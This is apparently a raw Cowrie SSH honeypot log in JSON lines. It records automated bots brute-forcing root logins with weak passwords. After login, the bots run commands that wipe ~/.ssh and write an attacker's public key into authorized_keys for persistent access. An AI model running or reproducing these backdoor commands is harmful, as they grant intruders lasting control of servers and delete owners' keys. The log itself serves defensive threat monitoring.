{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:40:29.420431Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:40:29.661658Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.login.success","username":"root","password":"r00t","message":"login attempt [root/r00t] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:40:30.670331Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:40:31.172730Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:40:31.173194Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:40:31.174353Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:40:31.416923Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:40:32.016851Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:40:32.017528Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:40:32.260980Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:40:32.261937Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46936,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec875b3fb984","protocol":"ssh","message":"New connection: 212.227.235.229:46936 (1.2.3.4:22) [session: ec875b3fb984]","sensor":"my-vps","timestamp":"2025-08-26T13:40:32.494726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:40:32.495727Z","src_ip":"212.227.235.229","session":"ec875b3fb984"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:40:32.727939Z","src_ip":"212.227.235.229","session":"ec875b3fb984"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:40:33.704515Z","src_ip":"212.227.235.229","session":"ec875b3fb984"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:40:34.959656Z","src_ip":"212.227.235.229","session":"ec875b3fb984"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46946,"dst_ip":"1.2.3.4","dst_port":22,"session":"7956765ef379","protocol":"ssh","message":"New connection: 212.227.235.229:46946 (1.2.3.4:22) [session: 7956765ef379]","sensor":"my-vps","timestamp":"2025-08-26T13:40:35.199547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:40:35.200488Z","src_ip":"212.227.235.229","session":"7956765ef379"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:40:35.443740Z","src_ip":"212.227.235.229","session":"7956765ef379"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:40:37.255420Z","src_ip":"212.227.235.229","session":"7956765ef379"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:40:37.510430Z","src_ip":"212.227.235.229","session":"ba9b7b1dd423"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:40:37.511591Z","src_ip":"212.227.235.229","session":"7956765ef379"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":45706,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8e57fb3ee6a","protocol":"ssh","message":"New connection: 167.99.49.89:45706 (1.2.3.4:22) [session: a8e57fb3ee6a]","sensor":"my-vps","timestamp":"2025-08-26T13:40:46.792574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:40:46.793497Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:40:46.885403Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.login.success","username":"root","password":"dupa","message":"login attempt [root/dupa] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:40:47.298311Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:40:47.536052Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:40:47.536827Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:40:47.537980Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:40:47.631734Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:40:47.842237Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:40:47.843177Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:40:47.938116Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:40:47.939203Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":45718,"dst_ip":"1.2.3.4","dst_port":22,"session":"f42c1cb6fbd6","protocol":"ssh","message":"New connection: 167.99.49.89:45718 (1.2.3.4:22) [session: f42c1cb6fbd6]","sensor":"my-vps","timestamp":"2025-08-26T13:40:48.025530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:40:48.026292Z","src_ip":"167.99.49.89","session":"f42c1cb6fbd6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:40:48.116064Z","src_ip":"167.99.49.89","session":"f42c1cb6fbd6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:40:48.517096Z","src_ip":"167.99.49.89","session":"f42c1cb6fbd6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:40:49.609146Z","src_ip":"167.99.49.89","session":"f42c1cb6fbd6"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":45726,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dd01e6c613a","protocol":"ssh","message":"New connection: 167.99.49.89:45726 (1.2.3.4:22) [session: 1dd01e6c613a]","sensor":"my-vps","timestamp":"2025-08-26T13:40:49.702799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:40:49.703827Z","src_ip":"167.99.49.89","session":"1dd01e6c613a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:40:49.795845Z","src_ip":"167.99.49.89","session":"1dd01e6c613a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:40:50.205110Z","src_ip":"167.99.49.89","session":"1dd01e6c613a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:40:50.298086Z","src_ip":"167.99.49.89","session":"1dd01e6c613a"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:40:50.299048Z","src_ip":"167.99.49.89","session":"a8e57fb3ee6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59224,"dst_ip":"1.2.3.4","dst_port":22,"session":"b62ad85495b8","protocol":"ssh","message":"New connection: 212.227.125.160:59224 (1.2.3.4:22) [session: b62ad85495b8]","sensor":"my-vps","timestamp":"2025-08-26T13:41:12.417149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:41:12.429538Z","src_ip":"212.227.125.160","session":"b62ad85495b8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-6